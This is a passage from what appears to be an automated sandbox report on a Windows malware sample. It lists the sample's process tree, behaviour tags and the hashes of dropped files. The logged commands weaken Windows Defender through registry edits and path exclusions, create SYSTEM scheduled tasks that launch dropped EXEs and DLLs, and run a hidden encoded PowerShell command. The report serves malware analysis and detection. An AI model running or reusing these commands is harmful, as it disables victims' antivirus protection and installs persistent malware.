REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbuklpUJi" /SC once /ST 05:22:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbuklpUJi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbuklpUJi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JkyFYglxaRELEtiZK" /SC once /ST 10:41:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ffBOsjvhiwhBXqAi\TaxhuBLqMdnWRXM\ZDogjes.exe\" OT /site_id 690689 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JkyFYglxaRELEtiZK"2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\ffBOsjvhiwhBXqAi\TaxhuBLqMdnWRXM\ZDogjes.exeC:\Windows\Temp\ffBOsjvhiwhBXqAi\TaxhuBLqMdnWRXM\ZDogjes.exe OT /site_id 690689 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Checks for any installed AV software in registry
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bIIVPNBwJtQvPFWhKj"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\cyYOBkwuU\VUOlzv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JexVkIJlQeblOjO" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JexVkIJlQeblOjO2" /F /xml "C:\Program Files (x86)\cyYOBkwuU\bFKybfM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JexVkIJlQeblOjO"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JexVkIJlQeblOjO"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VQYxXLntyBcMUg" /F /xml "C:\Program Files (x86)\YDeMNrUWYcEU2\MHyJqyl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QwlvWhTNpHCaj2" /F /xml "C:\ProgramData\VdsMkNQPiTWtDKVB\wWQjopK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IDnADNaRSIYhvWeSC2" /F /xml "C:\Program Files (x86)\MtmchuUihttnWuuiNDR\RFWwosQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yTiPAVRehfjvtWhHuuO2" /F /xml "C:\Program Files (x86)\sggSNgPbIWTFC\mtGkiUt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WtCrNUziOPqbUwgHC" /SC once /ST 09:12:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\tFaUUDcl\zYfKMuB.dll\",#1 /site_id 690689" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WtCrNUziOPqbUwgHC"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JkyFYglxaRELEtiZK"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2884 -ip 28841⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ffBOsjvhiwhBXqAi\tFaUUDcl\zYfKMuB.dll",#1 /site_id 6906891⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ffBOsjvhiwhBXqAi\tFaUUDcl\zYfKMuB.dll",#1 /site_id 6906892⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WtCrNUziOPqbUwgHC"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2884 -ip 28841⤵
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\BKngBackup\SyncBackupShell.exeFilesize
2.5MB
MD586554df719884fc253d2fbaddf86b8ac
SHA1239e41a0d77ce23b78f01160d537da6ce2765168
SHA256265ad7a9cb950fb49b70ac61ca4f9abe84a317367f88814b8cc13d2b41f74469
SHA512503c0cace3add8bb8f563609e9c2bebd4ce93d5ef8843bbfafcd9a70ba72df25a7a9f5d4752bdc8c21d56ea6c7440247ec75fe361c7e50f08e5f338903dfc1ec
-
C:\Program Files (x86)\BKngBackup\SyncBackupShell.exeFilesize
2.5MB
MD586554df719884fc253d2fbaddf86b8ac
SHA1239e41a0d77ce23b78f01160d537da6ce2765168
SHA256265ad7a9cb950fb49b70ac61ca4f9abe84a317367f88814b8cc13d2b41f74469
SHA512503c0cace3add8bb8f563609e9c2bebd4ce93d5ef8843bbfafcd9a70ba72df25a7a9f5d4752bdc8c21d56ea6c7440247ec75fe361c7e50f08e5f338903dfc1ec
-
C:\Program Files (x86)\ImageComparer\IC329.exeFilesize
5.3MB
MD5548af625c71ca2fcab2364d11bdcefa5
SHA1dc90387830f25b0c55c6e67377621739442bef93
SHA256ac80e5960a6b21478375d4fec460d9edbe8d69b37bdd70162aca94b1d32f398c
SHA512b0e35f1d3a6c06ef2b9962c2912222158cbc3742261cb84b710a679a1092ea6b39439373523fbe30e6a6f3307530891974d53f60dc4f20d958364c230d0008f0
-
C:\Program Files (x86)\ImageComparer\IC329.exeFilesize
5.3MB
MD5548af625c71ca2fcab2364d11bdcefa5
SHA1dc90387830f25b0c55c6e67377621739442bef93
SHA256ac80e5960a6b21478375d4fec460d9edbe8d69b37bdd70162aca94b1d32f398c
SHA512b0e35f1d3a6c06ef2b9962c2912222158cbc3742261cb84b710a679a1092ea6b39439373523fbe30e6a6f3307530891974d53f60dc4f20d958364c230d0008f0
-
C:\Program Files (x86)\MtmchuUihttnWuuiNDR\RFWwosQ.xmlFilesize
2KB
MD57aa2fa38f4fbea00395ed412a6df4746
SHA12f5a256eca9b77d7da541e324efb9d1056cc862c
SHA2560ec303fbf16c979f6d6cf9530ec077a520d5022441aaa661a6355e53299b61ca
SHA512dde95bd4fec9dd40b4fbac28474110c1e918f820502848be4b2ac61b3deb48962f791c82df1d70a4c699b278d8182e2fff14a0e9463c4da1b04caef0331013a6
-
C:\Program Files (x86)\YDeMNrUWYcEU2\MHyJqyl.xmlFilesize
2KB
MD5d3bfd45c730163546d8e4f594291588a
SHA11a4757475865c7ba76427e271276315073bff892
SHA2566bdf4b56e784edbe3ec3070fb75a06c14f00546fbd8928b629600b93a72873de
SHA512f4835c7e62bbcf4121454a419353d34155a24fcbd8c2a2e00a40936945bcfa1ed543e718e1d7dddc99c92e09118503f627f164a4d207a029577e2757069ef080
-
C:\Program Files (x86)\cyYOBkwuU\bFKybfM.xmlFilesize
2KB
MD587b5f938a2f92d6e2984af547e1f62d1
SHA1ced0cd773b216e4eeb935034287f2da7753c13ae
SHA256edad06d0005be00f4cbf089885b9715819cf36bba653bd41ccac58a2f47e7210
SHA5127dacf80652da2b0328b25029194514c4f6bba798ebe74b6e19e6ef415bbdcbe28f3e0d5a16ab23a85a58303e51a962c928b9897622a0406f96cf3802c9b38068
-
C:\Program Files (x86)\sggSNgPbIWTFC\mtGkiUt.xmlFilesize
2KB
MD5bbee7e3dfe63a1d08460ea8386f565c6
SHA17c1d0c6165b325d38cdf7b1625a22b7c91fb5a38
SHA256819839578f3074559fbd744e8cd03c58ccfd3e5d06bf7c34eb0522a88d9e5222
SHA512e710cb74e29ea7591f5901a889d3ff9851b317e28a4676874cffe3e842be759db8180fd39ce1aa5634ddde1c146e1bdcac071043b7c9628158d264546a2b5e82
-
C:\Program Files\Mozilla Firefox\browser\features\{A5735E22-7BD8-4CED-A24E-FBBD2D9CABB9}.xpiFilesize
369KB
MD50485e21ec2eb824f96965a7921ba2d48
SHA12f11724b51a2b5d4fa80b351bfc9a20aebd6520b
